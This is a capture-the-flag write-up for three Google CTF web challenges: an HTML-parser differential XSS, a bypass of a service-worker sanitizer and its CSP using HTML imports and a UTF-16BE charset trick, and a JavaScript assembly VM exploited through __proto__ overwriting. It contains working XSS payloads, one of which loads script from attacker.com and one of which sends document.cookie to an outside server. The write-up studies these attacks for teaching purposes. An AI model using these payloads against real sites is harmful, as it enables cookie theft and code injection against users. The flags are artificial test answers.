Google CTF - Geokitties & X Sanitizer & JS Assembly

02-08

Challenge: Geokitties

address: https://geokitties-ovp7g3kbo79399z9-dot-ctf-web-kuqo48d.appspot.com/

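Challenge code:

The hint says this challenge can be bypassed with special Unicode characters, but I wanted a simpler approach. The input here is only filtered, never encoded. So all we need is a difference between htmlparser2, which the challenge uses, and the browser's HTML parser, and then we can use that difference to get past the defense. For example, the browser parses attributes inside a closing tag while htmlparser2 does not, so the following code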

</z x="><i>">

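creates an <i> element in htmlparser2 (which treats </z x="> as invalid markup), but produces no tag at all in the browser. Building on this, the following payload hides an <a> element inside what htmlparser2 sees as an attribute value, while the browser parses it as a real tag: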

</z /x="><i x="><a href=https://attacker.com/attack.js onclick=documentElement.appendChild(createElement('script')).src=href>CLICK ME</a>"

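htmlparser2 also allows a tag name to start with _. We can use that to open an attribute that is never closed, so that the attribute's content ends up in the browser's DOM: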

<_ x="<a href=https://attacker.com/attack.js onclick=documentElement.appendChild(createElement('script')).src=href>CLICK ME</a>

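Of course, you can also fuzz Unicode with a script like the one below. It prints every character that is not an ASCII letter itself but whose lowercase form contains one:

for (var i = 0; i <= 0x10ffff; i++) {
  var c = String.fromCodePoint(i);
  var cl = c.toLowerCase();
  if (!/[a-z]/i.test(c) && /[a-z]/.test(cl)) {
    console.log(c);
  }
}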

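Challenge: The X Sanitizer

hint: This is the page we use to test our HTML sanitizer. We use it to strip payloads. If you can bypass it, we will give you the flag.

Overview

This is an HTML sanitizer. It filters suspicious input entered on index.html: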

<!DOCTYPE html>
<html>
<head>
  <title>The X Sanitizer</title>
  <meta http-equiv="Content-Security-Policy" content="default-src 'self'">
  <link rel="stylesheet" type="text/css" href="style.css"></link>
  <script src="main.js"></script>
  <script src="sanitizer.js"></script>
</head>
<body>
  [ ... ]
  <h2>Input HTML code</h2>
  <div id="input_form">
    <textarea id="input"></textarea>
    <button id="render">Sanitize and render</button>
    <button id="submit">Submit solution</button>
  </div>
  <h2>Sanitized HTML</h2>
  <xmp id="output_text"></xmp>
  <h2>Rendered sanitized HTML</h2>
  <div id="output_render"></div>
</body>
</html>

Note that the CSP only lets us load same-origin resources. Next, let's look at main.js, which wires up the buttons:

if (document.cookie.indexOf('flag=') === -1) document.cookie = 'flag=test_fl46'; // For testing

window.addEventListener("load", function() {
  // Main program logic
  var input = document.getElementById('input');
  var output_text = document.getElementById('output_text');
  var output_render = document.getElementById('output_render');
  var hash = location.hash.slice(1) ||
      'This is the <s>perfect</s><b>best</b>' +
      '<script>alert(document.domain);</script>' +
      '<i>HTML sanitizer</i>.' +
      '<script src="https://example.com"></script>';
  input.value = decodeURIComponent(hash);

  function render() {
    var html = input.value;
    location.hash = encodeURIComponent(html);
    sanitize(html, function (html){
      output_render.innerHTML = html;
      output_text.textContent = html;
    });
  }

  document.getElementById('render').addEventListener("click", render);
  render();
  document.getElementById('submit').addEventListener("click", function() {
    location = '/submit.html?html=' + encodeURIComponent(input.value)
  });
});

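When we click the "Sanitize and render" button, the listener calls render(), which passes the text box contents to sanitize() and finally uses innerHTML to put the sanitized result into a div. For us, though, the real centerpiece is sanitizer.js. It has two parts: one half implements sanitize(), and the other half is the service worker code that handles fetch requests: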

// [[[ 1 ]]]
function sanitize(html, callback) {
  if (!window.serviceWorkerReady) serviceWorkerReady = new Promise(function(resolve, reject) {
    if (navigator.serviceWorker.controller) return resolve();
    navigator.serviceWorker.register('sanitizer.js')
        .then(reg => reg.installing.onstatechange = e => (e.target.state == 'activated') ? resolve() : 0);
  });
  while (html.match(/meta|srcdoc|utf-16be/i)) html = html.replace(/meta|srcdoc|utf-16be/i, ''); // weird stuff...
  serviceWorkerReady.then(function() {
    var frame = document.createElement('iframe');
    frame.style.display = 'none';
    frame.src = '/sandbox?html=' + encodeURIComponent(html);
    document.body.appendChild(frame);
    addEventListener('message', function listener(msg) {
      if (msg.source != frame.contentWindow || msg.origin != location.origin) return;
      document.body.removeChild(frame);
      removeEventListener('message', listener);
      callback(msg.data);
    });
  });
}

// [[[ 2 ]]]
addEventListener('install', e => e.waitUntil(skipWaiting()));
addEventListener('activate', e => e.waitUntil(clients.claim()));
addEventListener('fetch', e => e.respondWith(clients.get(e.clientId).then(function(client) {
  var isSandbox = url => (new URL(url)).pathname === '/sandbox';
  if (client && isSandbox(client.url)) {
    if (e.request.url === location.origin + '/sanitize') {
      // [[[ 2 a ]]]
      return new Response(`
        onload = _=> setTimeout(_=> parent.postMessage(document.body.innerHTML, location.origin), 1000);
        remove = node => (node == document) ? document.body.innerHTML = '' : node.parentNode.removeChild(node);
        document.addEventListener("securitypolicyviolation", e => remove(e.target));
        document.write('<meta http-equiv="Content-Security-Policy" content="default-src \\'none\\'; script-src *"><body>');
      `);
    } else {
      // [[[ 2 b ]]]
      // Violation events often don't point to the violating element, so we need this additional logic to track them down.
      // This is also important from marketing perspective. Do not remove or simplify this logic.
      return new Response(`
        with(document) remove(document === currentScript.ownerDocument ? currentScript : querySelector('link[rel="import"]'));
        // <script src=x></script>
      `);
    }
  } else if (isSandbox(e.request.url)) {
    // [[[ 2 c ]]]
    return new Response(
      '<!doctype HTML>\n<script src=sanitize>\n</script>\n<body>' + decodeURIComponent(e.request.url.split('?html=')[1]),
      {headers: new Headers({'X-XSS-Protection': '0', 'Content-Type': 'text/html'})}
    );
  } else {
    // [[[ 2 d ]]]
    return fetch(e.request);
  }
})));

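In part [[[1]]], sanitize() registers this same script as a service worker. It then strips the blacklisted keywords from the HTML and creates an iframe whose src is /sandbox?html=XXX, where XXX is the HTML we submitted. When it receives a message from the iframe, it removes the iframe and hands the HTML from inside the iframe to the callback.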

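Part [[[2]]] adds a fetch event listener to intercept requests. If the request is for the sandbox URL (that is, /sandbox?html=XXX), it returns a simple HTML sandbox (part [[[2c]]]):

<!doctype HTML>
<script src=sanitize>
</script>
<body>INPUT_HTML

INPUT_HTML is the html parameter of the sandbox URL (XXX), that is, the markup to be sanitized. The response also sets X-XSS-Protection to 0 so that <script src=sanitize></script> is not blocked by the XSS Auditor.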

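The sanitizing script is loaded from /sanitize (part [[[2a]]]). If the request comes from the sandbox, the worker returns the script. One second after the page loads, the script sends the sandbox's document.body.innerHTML to the parent page with postMessage. It also defines a remove function that removes DOM elements which violate the CSP. Finally, it writes a new CSP that allows external scripts from any origin but blocks inline JavaScript.

Although the CSP inside the sandbox allows cross-origin loads, every other request made from inside the sandbox is intercepted by [[[2b]]], which answers with a script that removes the requesting <script> or <link rel="import">.

If the client is not the sandbox and the requested URL is not /sandbox, the request passes through untouched ([[[2d]]]).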

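Exploit

We need to solve two problems:

Get some JavaScript past the sanitizer.
Bypass the CSP.

Bypassing the sanitizer

If we violate the sandbox CSP (no inline scripts), the offending DOM element is removed: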

remove = node => (node == document) ? document.body.innerHTML = '' : node.parentNode.removeChild(node);
document.addEventListener("securitypolicyviolation", e => remove(e.target));

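There are two ways to load a script without triggering the CSP:

Load it with <script src=//example.com></script>.
Load it with <link rel="import">.

HTML imports also follow the script-src rule, so <link rel="import" href="http://example.com/"> does not violate the sandbox CSP. The <link rel="import"> is still removed, however, by the script that the service worker returns: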

with(document) remove(document === currentScript.ownerDocument ? currentScript : querySelector('link[rel="import"]'));

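Note that querySelector() returns only the first matching element, so putting one extra <link rel="import"> in front of the real one is enough to get past the sanitizer.

With such a payload, the second <link rel="import"> survives sanitization and is added to the DOM.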
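The first-match behaviour can be modelled without a browser. The sketch below is only a simulation: makeDoc, isImport and runSanitizer are hypothetical helpers, the node list is not a real DOM, and it assumes that a <link rel="import"> without an href never triggers a fetch (so the removal script runs once per fetched import).

```javascript
// Simulated sandbox document: a flat list of nodes in document order.
// This is NOT a real DOM; it only mimics "querySelector returns the first match".
function makeDoc(nodes) {
  return {
    nodes: nodes.slice(),
    querySelector(pred) {
      return this.nodes.find(pred) || null;
    },
    remove(node) {
      this.nodes = this.nodes.filter(n => n !== node);
    },
  };
}

const isImport = n => n.tag === "link" && n.rel === "import";

// Mimics the [[[ 2 b ]]] response running once for every import that was fetched.
function runSanitizer(doc) {
  const fetched = doc.nodes.filter(n => isImport(n) && n.href);
  for (const _ of fetched) {
    const victim = doc.querySelector(isImport); // always the FIRST import link
    if (victim) doc.remove(victim);
  }
  return doc.nodes;
}

// A single import is removed by its own load.
const single = runSanitizer(makeDoc([
  { tag: "link", rel: "import", href: "/sandbox?html=x" },
]));

// With a decoy in front, the decoy is removed and the real import survives.
const withDecoy = runSanitizer(makeDoc([
  { tag: "link", rel: "import" }, // decoy: no href, assumed never fetched
  { tag: "link", rel: "import", href: "/sandbox?html=x" },
]));

console.log(single.length);
console.log(withDecoy.map(n => n.href));
```

In the simulation the removal logic spends its single querySelector() hit on the decoy, which is the behaviour the payload relies on.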

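Bypassing the CSP

Since the main page's CSP only allows same-origin scripts, the only page we can use as a script source is clearly /sandbox?html=. However, it prepends HTML tags to our JavaScript, which makes the code invalid. I wondered whether changing the character set of the JavaScript would get around this. If the output of /sandbox?html= is interpreted as UTF-16BE, the decoded prefix (the HTML tags inserted before our code) looks like a valid, though undefined, identifier to the JavaScript parser. The script then becomes an assignment to that identifier followed by our code, so we only need to send an encoded =0;alert(1) and the browser pops an alert.

Unfortunately, UTF-16BE is a filtered keyword: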

while (html.match(/meta|srcdoc|utf-16be/i)) html = html.replace(/meta|srcdoc|utf-16be/i, '');
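A quick sketch of what this loop does and does not catch. The function name stripKeywords and both sample inputs are made up for illustration; the loop body is the one from sanitize() with the empty replacement string written out. Repeating the replacement defeats nested keywords, but the filter only sees the literal string, so a percent-encoded letter slips through and is only turned back into the keyword by a later decodeURIComponent (as the sandbox handler does).

```javascript
// Same loop as in sanitize(), wrapped in a function so it can be tested.
function stripKeywords(html) {
  while (html.match(/meta|srcdoc|utf-16be/i)) {
    html = html.replace(/meta|srcdoc|utf-16be/i, "");
  }
  return html;
}

// Nesting a keyword inside itself does not help: the loop runs until nothing matches.
const nested = stripKeywords('<memetata charset="UTF-16BE">');

// Percent-encoding one letter hides the keyword from the regex.
const encoded = stripKeywords("<script charset=%22utf-16b%65%22>");

console.log(nested);
console.log(encoded);
console.log(decodeURIComponent(encoded));
```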

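We can get around the check with URL encoding. For example, a percent-encoded payload can make the resulting page contain <meta>.

Final payload

We replace the <meta> with a <script> and set the charset on it: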

<link rel=import><link rel=import href="https://sanitizer.web.ctfcompetition.com/sandbox?html=<script charset=%22utf-16b%65%22%20src=/sandbox%3fhtml=PAYLOAD></script>">

I used the following payload:

=0;location.href='http://myserver/'+document.cookie;

Then I encoded it:

%00=%000%00;%00l%00o%00c%00a%00t%00i%00o%00n%00.%00h%00r%00e%00f%00=%00'%00h%00t%00t%00p%00:%00/%00/%00m%00y%00s%00e%00r%00v%00e%00r%00/%00'%00+%00d%00o%00c%00u%00m%00e%00n%00t%00.%00c%00o%00o%00k%00i%00e%00;

That gives us the final payload. Note that the payload has to be encoded a second time. Otherwise it would already be decoded on the first visit to the sandbox?html= URL (the URL is visited twice in total):

<link rel=import><link rel=import href="https://sanitizer.web.ctfcompetition.com/sandbox?html=<script charset=%22utf-16b%65%22%20src=/sandbox%3fhtml=%2500=%25000%2500;%2500l%2500o%2500c%2500a%2500t%2500i%2500o%2500n%2500.%2500h%2500r%2500e%2500f%2500=%2500'%2500h%2500t%2500t%2500p%2500:%2500/%2500/%2500m%2500y%2500s%2500e%2500r%2500v%2500e%2500r%2500/%2500'%2500+%2500d%2500o%2500c%2500u%2500m%2500e%2500n%2500t%2500.%2500c%2500o%2500o%2500k%2500i%2500e%2500;></script>">
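The two encoding steps can be reproduced with a small helper. This is a sketch under stated assumptions: toUtf16BeEscapes and doubleEncode are hypothetical names, the input is assumed to be plain ASCII, and characters such as space, # or & (which would need extra escaping inside a URL) are not handled.

```javascript
// Prefix every character with a NUL byte so that, read as UTF-16BE,
// the byte pair 0x00 0xNN decodes back to the original ASCII character.
function toUtf16BeEscapes(ascii) {
  return Array.from(ascii, ch => {
    if (ch.charCodeAt(0) > 0x7f) throw new RangeError("ASCII input only");
    return "%00" + ch;
  }).join("");
}

// Escape the percent signs once more so the string survives two rounds of decoding.
function doubleEncode(escaped) {
  return escaped.replace(/%/g, "%25");
}

const once = toUtf16BeEscapes("=0;alert(1)");
const twice = doubleEncode(once);

console.log(once);
console.log(twice);
```

One round of decodeURIComponent on the double-encoded string gives back the single-encoded form, which is what the second request to /sandbox?html= needs to receive.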

HTML generated by Chrome:

In the end we received the flag: CTF{no-problem-this-can-be-fixed-by-adding-a-single-if}

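Challenge: Web-Based Assembly Language

We exploit a bug in the assembler (reading and writing functions on arrays) to overwrite __proto__, then make each worker execute our code and return the flag.

If you want to run the program, you can download it here:

index.html asm.js constants.js test.js vm.js worker.js

This code implements a curious IDE. Let's take a look at it.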

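Introduction

The original code was minified, and we can beautify it here. Later, Google also released an unminified copy. For readability, this writeup uses the code Google gave us.

Summary

The challenge works roughly like this: after writing code, the user clicks the compile button, and the program runs our code against many sets of test data. Each test case has a specific input and a matching answer. Our code must return the correct answer with ret, otherwise the test fails.

Once all tests have finished, the program asks whether you want to compile the code and upload it to the server. The server then runs the same set of tests (also in a browser), and when the program's output matches the answers the server expects, the server returns the result to us.

To get the right answer, we have to pass a test called flag. This test is special: the server gives you no input at all, yet it still checks the code's output. So we have to resort to some hacking.

Web-based assembly language

The language has two parts: data and code.

Data

Data follows this format: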

<data> ::= <variable_name> <type> <value>
<variable_name> ::= "$" <string>
<type> ::= "int" | "float" | "string" | "mem"
<value> ::= <integer> | <string>

and it is compiled like this:

switch (u) {
  case "string":
    parsedData = [8].concat(stringToInternal(f));
    break;
  case "int":
    parsedData = [4].concat(intToInternal(f | 0));
    break;
  case "float":
    parsedData = [7].concat(Array.from(new Uint8Array((new Float64Array([Number(f)])).buffer)));
    break;
  case "mem":
    for (currrentMemLength = 0; a < Number(requiredMemLength); currrentMemLength += 4) parsedData.push(0, 0, 127, 127);
    break;
  default:
    throw Error("Error parsing " + a);
}

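We can see that the first element of each datum stores its type and the remaining elements hold its other properties. The solution has little to do with how data is stored, though, so we do not need to study this part closely.

Assembly code

The assembly code format is as follows (jump is not needed for the solution, so I left it out):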

<code> ::= <command> <to_variable> <aux_variable>
<to_variable> ::= <to_inline_variable> | <data_section_variable>
<to_inline_variable> ::= "int" | "float" <value>
<aux_variable> ::= <aux_inline_variable> | <data_section_variable>
<aux_inline_variable> ::= "int" | "float" | "string" <value>
<data_section_variable> ::= "$" <variable_name>

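Our assembler has the following instructions: mov cmp jlz jgz jnz jez ret add sub mul div mod and orr xor not shl shr prt get. Each instruction takes two arguments. Take mov as an example: its first argument is an offset (which locates the variable) and its second argument is the value to assign to that variable: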

.data
$a int 1
.code
mov int 0 string abc

This instruction assigns abc to the first variable.

Now let's look at how the instructions are parsed:

String(code).replace(/^\s*(([a-z]{3})\s+(?:(int|float)?\s*(\S+))(?:\s*(?:(int|float|string)?\s*(.+))))/img, function(totalMatch, instruction, toType, toValue, auxType, auxValue) {
  // (the if-branch preceding this else is not part of the excerpt)
  else {
    parseData = function(variableType, variableValue, d) {
      switch (variableType) {
        case "int":
          compiledCode.push([4], (variableValue));
          break;
        case "float":
          compiledCode.push([7], Array.from(new Uint8Array((new Float64Array([variableValue])).buffer)));
          break;
        case "string":
          compiledCode.push([8], p(variableValue));
          break;
        default:
          // this occurs when no type was specified, thus we face a variable.
          // The value will need to be dereferenced before being used
          compiledCode.push([(d ? 128 : 0) + 5], new Uint8Array(c.labels[variableValue].buffer))
      }
    };
    var instructionOffset = predefinedInstructions.indexOf(instruction);
    compiledCode.push([instructionOffset]);
    parseData(toType, toValue, false);
    parseData(auxType, auxValue, true);
  }
});

This regular expression does not allow string as the first type, but we can patch it like this:

- /^\s*(([a-z]{3})\s+(?:(int|float)?\s*(\S+))(?:\s*(?:(int|float|string)?\s*(.+))))/img
+ /^\s*(([a-z]{3})\s+(?:(int|float|string)?\s*(\S+))(?:\s*(?:(int|float|string)?\s*(.+))))/img

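Now we can use a string as an array index at compile time. For example, mov string toString string abc actually performs memory['toString'] = 'abc'. (Translator's note: the server runs our already compiled code, and this check only happens during compilation on the client, so the server will execute the instruction above.)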
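The effect of the patch can be checked directly on one line of assembly. This is a sketch, assuming the backslashes in \s and \S are as in the patterns quoted here and that only a single line is matched (so the g flag is dropped); parse is a hypothetical helper that names the capture groups after the callback parameters.

```javascript
// Patterns from the writeup, with the \s and \S escapes written out.
const original = /^\s*(([a-z]{3})\s+(?:(int|float)?\s*(\S+))(?:\s*(?:(int|float|string)?\s*(.+))))/im;
const patched = /^\s*(([a-z]{3})\s+(?:(int|float|string)?\s*(\S+))(?:\s*(?:(int|float|string)?\s*(.+))))/im;

// Group 1 is the whole instruction; groups 2..6 are the individual parts.
function parse(re, line) {
  const m = re.exec(line);
  return m && {
    instruction: m[2],
    toType: m[3],
    toValue: m[4],
    auxType: m[5],
    auxValue: m[6],
  };
}

const line = "mov string __proto__ string abc";
const before = parse(original, line);
const after = parse(patched, line);

console.log(before); // "string" ends up as toValue, i.e. it is treated as a label name
console.log(after);  // "string" is recognised as the type of the first operand
```

With the original pattern the word string is swallowed as the operand itself and the rest of the line becomes the second operand. With the patched pattern the first operand is a typed string, which is what lets a property name act as the destination.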

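String "dereferencing"

Let's look at the function that processes instruction arguments:

The first byte (bytes[0]) stores the type of the data. The function uses this byte to decide whether the argument passed in is a pointer. The code never checks what type of data the pointer refers to, so by changing the high byte of the data (translator's note: compiled data uses this byte to represent the type) we can introduce a new type: a string pointer. When such a pointer is dereferenced with [view[0]], we can access properties of memory (such as __proto__ and constructor).

For the rest of this article, I will use the term hui for a string pointer.

Another thing worth noting is getValue: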

function getValue(value, memory) {
  try {
    return getValue(value(memory), memory);
  } catch (e) {
    return value;
  }
}

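It keeps calling value recursively for as long as the result is callable, and returns the first result that is not. The argument is always memory, but this still lets us call any function we can reach.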
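A short usage sketch makes the recursion concrete. getValue is copied from the listing; the memory array and the sample arguments are made up for illustration.

```javascript
function getValue(value, memory) {
  try {
    // If value is callable, call it with memory and resolve the result again.
    return getValue(value(memory), memory);
  } catch (e) {
    // Calling a non-function throws a TypeError, which ends the recursion.
    return value;
  }
}

const memory = ["a", "b", "c"];

const plain = getValue(5, memory);                   // not callable: returned as is
const called = getValue(m => m.length, memory);      // called once with memory
const chained = getValue(m => (n => n[0]), memory);  // the returned function is called too

console.log(plain, called, chained);
```

Note that the catch block also swallows errors thrown inside the called function, in which case the function itself is returned rather than a result.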

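Executing code in the worker

After the code is compiled, it is first tested locally against many sets of data. Each set runs in its own worker, which returns its result with postMessage. The worker's result is compared with the answer, and if it is correct, a character of the flag is returned. However, the worker is given no input and the code runs on the server, which is why we need to execute code inside the worker.

Let's summarize what we have so far:

Pass a string to mov to change properties of memory
Use hui to read properties of memory
Call arbitrary functions reachable from memory

First, look at the following code: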

/*1*/ memory.__proto__ = memory.pop;   // __proto__ is now a function
/*2*/ var f = memory.constructor;      // constructor now resolves to Function
memory.__proto__ = orig_proto;         // restore the original __proto__
memory[0] = 'alert(1)';                // the code to execute
memory[1] = '1/*';
memory[100500] = '*/';
/*3*/ f(memory)(memory);               // calls Function(memory),
                                       // which is equivalent to Function(memory.toString())

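At /*1*/ we replace __proto__ with a function. At /*2*/, reading memory.constructor therefore yields Function instead of Array. At /*3*/ we pass memory to that function and call the result. At that point, memory.toString() looks like this: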

alert(1),1/*blah,blah,blah,,,,,,,,*/

This pops an alert.
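The same trick can be tried outside the challenge. The sketch below is an adaptation, not the challenge code: it assumes an engine where the __proto__ accessor is available, replaces alert(1) with a write to a made-up global (globalThis.injectedRan), and uses index 10 instead of 100500 to keep the generated body short.

```javascript
const memory = [];
const origProto = Object.getPrototypeOf(memory);

// 1: make a function (Array.prototype.pop) the prototype of memory.
memory.__proto__ = memory.pop;

// 2: constructor is now inherited from Function.prototype, so this is Function.
const f = memory.constructor;

// Restore the array prototype so that toString() joins the elements again.
memory.__proto__ = origProto;

memory[0] = "globalThis.injectedRan = true"; // the code to execute
memory[1] = "1/*";                           // opens a comment that hides the holes
memory[10] = "*/";                           // closes the comment

const body = memory.toString();

// 3: Function(memory) stringifies the array and compiles it as a function body.
f(memory)(memory);

console.log(f === Function);
console.log(body);
console.log(globalThis.injectedRan);
```

The comment markers are what make the comma-separated array contents parse as a function body: everything between index 1 and the last element is commented out.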

We can reproduce the JavaScript version of the alert with the following assembly code:

.data
$code string alert(1)
$comm string 1/*
$proto string 1
$constr string 1
$res string 1
.code
&main:
mov int 100500 string */
mov $proto hui __proto__
mov string __proto__ hui pop
mov $constr hui constructor
mov string __proto__ $proto
mov $res $constr

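This code stores its values in the .data section rather than in memory[0] and memory[1], but the effect is the same.

Keeping the worker alive with an exception

Now let's look at how the worker's message is handled: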

...
function TestCaseError(data) {
  Error.call(this, this.message = 'Wrong answer on test ' + data.test);
}
TestCaseError.prototype = Error.prototype;
...
  worker.onmessage = function(e) {
    if (e.data['answer'] == test[1]) {
      resolve(e.data);
    } else {
      reject(new TestCaseError(e.data));
    }
    worker.terminate();
  };
...

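We can now send arbitrary data from the worker. Can we make this onmessage handler ignore wrong data and only return correct data? The answer is to send a value that cannot be converted to a string as data.test. For a wrong answer, building the TestCaseError message then throws inside the handler, before reject() and worker.terminate() are reached, so the worker keeps running.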
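The behaviour can be simulated without real workers. In this sketch TestCaseError is taken from the listing, while makeHandler, the state object (standing in for resolve, reject and worker.terminate), the expected answer "T" and the guess alphabet are all assumptions made for illustration. The try/catch around the handler call imitates the browser, where an error thrown in an event handler does not stop the worker.

```javascript
function TestCaseError(data) {
  // String concatenation calls ToPrimitive on data.test and throws if that fails.
  Error.call(this, this.message = "Wrong answer on test " + data.test);
}
TestCaseError.prototype = Error.prototype;

// Stand-in for the page-side handler; state replaces resolve/reject/terminate.
function makeHandler(expected) {
  const state = { resolved: null, rejected: null, terminated: false };
  function handle(e) {
    if (e.data["answer"] == expected) {
      state.resolved = e.data;
    } else {
      state.rejected = new TestCaseError(e.data); // throws before the assignment
    }
    state.terminated = true; // corresponds to worker.terminate()
  }
  return { state, handle };
}

const { state, handle } = makeHandler("T");
let attempts = 0;

for (const guess of "ABCDEFGHIJKLMNOPQRSTUVWXYZ") {
  if (state.terminated) break;
  attempts++;
  try {
    // toString is not callable, so the object cannot be converted to a string.
    handle({ data: { answer: guess, test: { toString: 0 } } });
  } catch (err) {
    // Wrong guess: the handler threw, nothing was rejected or terminated.
  }
}

console.log(attempts, state.resolved.answer, state.rejected);
```

Only the correct guess reaches the terminate step, so a single worker can try every candidate character.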

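The complete solution

Putting the techniques above together, we can proceed as follows:

Compile code that uses the hui type, so that we can execute code inside the worker and test for the correct character
Inside the worker, brute-force each flag character with the following code: postMessage({"answer":flag_character_guess, "test": {"toString":0}})
Because an exception is thrown, incorrect results are ignored by onmessage, and the correct one is returned
After all tests have passed, we get the flag!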

The final answer is: C,T,F,{,_,r,3,m,0,v,3,_,t,h,3,_,c,0,m,m,4,s,_,p,l,z,_,k,t,h,x,b,y,e,_,}